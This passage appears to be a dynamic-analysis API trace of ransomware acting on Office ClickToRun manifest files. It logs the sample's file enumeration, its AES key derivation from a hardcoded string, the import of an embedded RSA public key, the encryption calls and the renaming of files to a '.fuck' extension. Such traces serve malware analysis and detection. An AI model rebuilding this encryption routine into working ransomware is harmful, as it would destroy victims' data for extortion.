hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.384] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.384] GetLastError () returned 0x5 [0239.384] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml")) returned 0x20 [0239.384] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.384] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.385] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.385] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.386] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28abf20) returned 1 [0239.388] CryptCreateHash (in: hProv=0x28abf20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.388] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.388] CryptHashData (hHash=0x2893fb0, pbData=0x2856e80, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.388] CryptDeriveKey (in: hProv=0x28abf20, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893af0) returned 1 [0239.389] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.389] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.389] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ab8c0) returned 1 [0239.389] CryptImportPublicKeyInfo (in: hCryptProv=0x28ab8c0, dwCertEncodingType=0x1, pInfo=0x28987c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28987f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28987f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28944f0) returned 1 [0239.389] CryptEncrypt (in: hKey=0x28944f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.389] CryptEncrypt (in: hKey=0x28944f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ac470*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ac470*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.389] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ac470, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.390] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.390] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.390] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.390] CloseHandle (hObject=0xffffffff) returned 1 [0239.390] CloseHandle (hObject=0xffffffff) returned 1 [0239.390] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.390] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.391] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml.gsg")) returned 0 [0239.391] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.en-us.xml.fuck")) returned 0 [0239.392] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.392] CryptDestroyKey (hKey=0x2893af0) returned 1 [0239.392] CryptReleaseContext (hProv=0x28abf20, dwFlags=0x0) returned 1 [0239.392] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.392] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.392] GetLastError () returned 0x5 [0239.392] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml")) returned 0x20 [0239.392] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml", dwFileAttributes=0x80) returned 0 [0239.392] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.393] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.393] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.393] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28abf20) returned 1 [0239.396] CryptCreateHash (in: hProv=0x28abf20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.396] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.396] CryptHashData (hHash=0x2893fb0, pbData=0x28573f8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.396] CryptDeriveKey (in: hProv=0x28abf20, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893af0) returned 1 [0239.396] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.396] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.396] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ad3d8) returned 1 [0239.397] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad3d8, dwCertEncodingType=0x1, pInfo=0x2897780*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28977b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28977b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28945f0) returned 1 [0239.397] CryptEncrypt (in: hKey=0x28945f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.397] CryptEncrypt (in: hKey=0x28945f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28acf98*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28acf98*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.397] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28acf98, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.397] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.397] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.397] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.397] CloseHandle (hObject=0xffffffff) returned 1 [0239.397] CloseHandle (hObject=0xffffffff) returned 1 [0239.397] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), bFailIfExists=0) returned 0 [0239.398] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml", dwFileAttributes=0x0) returned 0 [0239.398] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml.gsg")) returned 0 [0239.399] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.es-es.xml.fuck")) returned 0 [0239.399] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.399] CryptDestroyKey (hKey=0x2893af0) returned 1 [0239.399] CryptReleaseContext (hProv=0x28abf20, dwFlags=0x0) returned 1 [0239.399] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.399] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.399] GetLastError () returned 0x5 [0239.400] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml")) returned 0x20 [0239.400] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml", dwFileAttributes=0x80) returned 0 [0239.400] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.401] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.401] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.403] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28abf20) returned 1 [0239.405] CryptCreateHash (in: hProv=0x28abf20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.405] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.406] CryptHashData (hHash=0x2893b70, pbData=0x28573f8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.406] CryptDeriveKey (in: hProv=0x28abf20, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.406] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.406] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.406] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ac580) returned 1 [0239.406] CryptImportPublicKeyInfo (in: hCryptProv=0x28ac580, dwCertEncodingType=0x1, pInfo=0x2898890*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28988c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28988c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894630) returned 1 [0239.406] CryptEncrypt (in: hKey=0x2894630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.406] CryptEncrypt (in: hKey=0x2894630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ace00*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ace00*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.407] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ace00, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.407] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.407] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.407] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.407] CloseHandle (hObject=0xffffffff) returned 1 [0239.407] CloseHandle (hObject=0xffffffff) returned 1 [0239.407] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), bFailIfExists=0) returned 0 [0239.407] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml", dwFileAttributes=0x0) returned 0 [0239.408] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml.gsg")) returned 0 [0239.408] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proof.culture.msi.16.fr-fr.xml.fuck")) returned 0 [0239.409] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.409] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.409] CryptReleaseContext (hProv=0x28abf20, dwFlags=0x0) returned 1 [0239.409] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.409] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.409] GetLastError () returned 0x5 [0239.409] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml")) returned 0x20 [0239.417] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.418] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.418] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.419] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.419] 